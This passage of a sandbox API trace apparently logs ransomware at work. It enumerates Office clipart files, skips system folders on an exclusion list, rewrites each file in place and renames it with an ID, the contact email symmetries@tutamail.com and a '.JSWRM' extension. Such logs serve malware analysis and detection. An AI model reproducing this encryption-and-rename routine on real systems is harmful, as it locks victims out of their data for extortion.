[0099.467] ReadFile (in: hFile=0x314, lpBuffer=0x20b1f8, nNumberOfBytesToRead=0x2a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesRead=0x345e89c*=0x2a0, lpOverlapped=0x0) returned 1 [0099.468] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.468] WriteFile (in: hFile=0x314, lpBuffer=0x20b1f8*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20b1f8*, lpNumberOfBytesWritten=0x345e898*=0x2a0, lpOverlapped=0x0) returned 1 [0099.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20b1f8 | out: hHeap=0x1e0000) returned 1 [0099.468] CloseHandle (hObject=0x314) returned 1 [0099.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0099.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0099.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.468] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0099.468] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.468] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0099.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0099.469] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0099.469] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0099.469] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01294_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01294_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01294_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01294_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0099.470] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.470] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x10491364, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x10491364, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x161, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01295_.GIF", cAlternateFileName="")) returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2=".") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="..") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="...") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="windows") returned -1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="recovery") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="perflogs") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="documents and settings") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="system volume information") returned 1 [0099.470] lstrcmpiW (lpString1="WB01295_.GIF", lpString2="msocache") returned 1 [0099.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01295_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01295_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01295_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0099.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01295_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01295_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01295_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0099.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0099.471] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.471] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.471] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0099.471] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01295_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01295_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.472] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=353) returned 1 [0099.472] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.472] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x160) returned 0x234a30 [0099.472] ReadFile (in: hFile=0x314, lpBuffer=0x234a30, nNumberOfBytesToRead=0x160, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesRead=0x345e89c*=0x160, lpOverlapped=0x0) returned 1 [0099.473] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.473] WriteFile (in: hFile=0x314, lpBuffer=0x234a30*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x234a30*, lpNumberOfBytesWritten=0x345e898*=0x160, lpOverlapped=0x0) returned 1 [0099.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x234a30 | out: hHeap=0x1e0000) returned 1 [0099.473] CloseHandle (hObject=0x314) returned 1 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0099.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0099.473] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0099.473] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0099.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0099.473] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0099.473] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01295_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01295_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01295_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01295_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0099.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0099.474] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0099.474] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x10491364, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1ef, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01296_.GIF", cAlternateFileName="")) returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2=".") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="..") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="...") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="windows") returned -1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="recovery") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="perflogs") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="documents and settings") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.474] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="system volume information") returned 1 [0099.475] lstrcmpiW (lpString1="WB01296_.GIF", lpString2="msocache") returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01296_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01296_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01296_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01296_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01296_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01296_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0099.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0099.475] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.475] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.475] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210878 [0099.475] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01296_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01296_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.476] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=495) returned 1 [0099.476] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.476] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1e0) returned 0x240090 [0099.476] ReadFile (in: hFile=0x314, lpBuffer=0x240090, nNumberOfBytesToRead=0x1e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x240090*, lpNumberOfBytesRead=0x345e89c*=0x1e0, lpOverlapped=0x0) returned 1 [0099.477] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.477] WriteFile (in: hFile=0x314, lpBuffer=0x240090*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x240090*, lpNumberOfBytesWritten=0x345e898*=0x1e0, lpOverlapped=0x0) returned 1 [0099.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240090 | out: hHeap=0x1e0000) returned 1 [0099.477] CloseHandle (hObject=0x314) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0099.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0099.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0099.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a240 [0099.477] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a240, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a240 | out: hHeap=0x1e0000) returned 1 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0099.477] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0099.477] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0099.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.478] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01296_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01296_.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01296_.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01296_.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0099.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0099.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0099.478] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0099.478] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1046b0f3, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1046b0f3, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1046b0f3, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x37e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="WB01297_.GIF", cAlternateFileName="")) returned 1 [0099.478] lstrcmpiW (lpString1="WB01297_.GIF", lpString2=".") returned 1 [0099.478] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="..") returned 1 [0099.478] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="...") returned 1 [0099.478] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="windows") returned -1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="recovery") returned 1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="perflogs") returned 1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="documents and settings") returned 1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="$RECYCLE.BIN") returned 1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="system volume information") returned 1 [0099.479] lstrcmpiW (lpString1="WB01297_.GIF", lpString2="msocache") returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f98 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01297_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01297_.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01297_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f98 | out: hHeap=0x1e0000) returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01297_.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="WB01297_.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WB01297_.GIF", lpUsedDefaultChar=0x0) returned 12 [0099.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0099.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0099.479] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0099.479] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0099.479] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0099.479] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\WB01297_.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\wb01297_.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0099.480] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=894) returned 1 [0099.480] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.480] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x370) returned 0x20e550 [0099.480] ReadFile (in: hFile=0x314, lpBuffer=0x20e550, nNumberOfBytesToRead=0x370, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesRead=0x345e89c*=0x370, lpOverlapped=0x0) returned 1 [0099.481] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0099.481] WriteFile (in: hFile=0x314, lpBuffer=0x20e550*, nNumberOfBytesToWrite=0x370, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x20e550*, lpNumberOfBytesWritten=0x345e898*=0x370, lpOverlapped=0x0) returned 1 [0099.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20e550 | out: hHeap=0x1e0000) returned 1 [0099.482] CloseHandle (hObject=0x314) returned 1 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0099.482] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0099.482] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0099.482] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0099.482] HeapFree (in: hHeap=0x1e0000, 